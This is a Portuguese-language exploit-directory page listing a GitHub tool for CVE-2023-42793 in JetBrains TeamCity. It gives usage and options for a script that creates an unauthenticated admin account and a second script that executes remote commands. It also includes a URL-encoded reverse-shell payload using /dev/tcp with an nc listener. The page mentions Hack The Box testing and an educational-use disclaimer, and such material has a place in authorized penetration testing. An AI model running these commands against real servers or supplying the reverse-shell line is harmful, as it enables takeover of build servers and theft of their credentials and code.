Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/b4l3ri0n/cve-2023-42793
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - Execução Remota de Código (RCE), CVE-2023-42793

Ver Repositório
1133há 2 anosAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-42793 - Criação de conta de administrador no TeamCity leva a RCE

Use primeiro exploit.py para criar uma conta de administrador para você e depois use rce.py para executar comandos no alvo. Para reverse shell, veja isto

script de exploração

Descrição

Este script explora a CVE-2023-42793 para criar uma conta de administrador em um servidor TeamCity. Ele envia uma requisição POST para a URL alvo para criar um usuário administrador com credenciais especificadas ou aleatórias.

Uso

root@kitploit:~
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

Opções

  • -u, --url URL: URL alvo (obrigatório)
  • -v, --verbose: Ativar modo verboso
  • -n, --username USERNAME: Especificar nome de usuário (padrão: aleatório)
  • -p, --password PASSWORD: Especificar senha (padrão: aleatório)
  • -e, --email EMAIL: Especificar email (padrão: aleatório)
  • -t, --token-file: Arquivo para salvar o token
  • Pré-requisitos

    • Python 3.x
    • Bibliotecas Python
      • Para instalar as dependências: pip3 install -r requirements.txt

    Exemplos

    1. Exploração com nome de usuário, senha e email aleatórios:

      root@kitploit:~
      python exploit.py -u http://target.com
      
    2. Exploração com nome de usuário, senha e email especificados:

      root@kitploit:~
      python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
      

    Saída

    Após exploração bem-sucedida, o script exibe a URL, o nome de usuário e a senha da conta de administrador criada e salva a saída no arquivo de token.

    Script de Execução Remota de Código (RCE)

    Descrição

    Este script permite executar comandos em um servidor TeamCity vulnerável explorando a CVE-2023-42793. Primeiro, ele ativa os processos de depuração e depois executa o comando especificado usando os endpoints apropriados da API.

    Uso

    root@kitploit:~
    python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
    

    Opções

    • -u, --url URL: URL alvo (obrigatório)
    • -t, --token-file: Para especificar o arquivo contendo o token
    • -c, --command COMMAND: Especificar comando a executar (RCE)
    • -P, --port PORT: Especificar porta (padrão é 80)

    Exemplo

    Exploração com um comando especificado:

    root@kitploit:~
    python rce.py -u http://target.com -t token -c "whoami"
    

    Para reverse shell

    root@kitploit:~
    python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
    
    • Neste comando para reverse shell, substitua {IP} pelo seu IP e {port} pela porta em que você está escutando
    • Crie um listener usando nc, por exemplo: nc -nvlp 5555
    • Para mais informações, veja revshells

    Notas

    • Este script foi testado na máquina Runner.htb do Hack The Box
    • Este script é apenas para fins educacionais.
    • Use-o com responsabilidade e apenas em sistemas que você está autorizado a testar.

    Créditos

    • Zyad Elsayed
      • Repositório GitHub: Zyad-Elsayed
      • Conta LinkedIn: zyad-abdelbary
    • Exploit original para conta de administrador: ByteHunter (Exploit-DB)

    Recursos

    • Descrição da CVE-2023-42793: Descrição oficial da vulnerabilidade CVE.
    • Entrada no Exploit Database: Código original do exploit no Exploit Database.
    • Blog da TeamCity: Postagem no blog discutindo a vulnerabilidade CVE-2023-42793 no TeamCity.
    • Documentação do TeamCity: Documentação oficial do TeamCity.
    Baixar ferramenta